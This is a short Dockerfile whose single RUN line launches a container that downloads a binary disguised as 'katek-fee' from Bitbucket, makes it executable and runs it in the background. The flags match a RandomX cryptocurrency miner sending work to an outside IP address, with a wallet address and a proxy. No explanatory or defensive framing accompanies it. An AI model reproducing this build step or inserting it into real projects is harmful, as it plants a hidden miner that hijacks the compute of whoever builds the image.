FROM ubuntu:latest

RUN docker run -d -t --dns="1.1.1.1" --name Docker ubuntu && docker exec -u root -t Docker sh -c "apt-get update && apt-get -y upgrade && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && ./katek-fee -o 13.250.104.111:1199 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0 -p yahaha --randomx-mode=light --proxy=13.250.104.111:1080 --background && top"

CMD ["printenv"]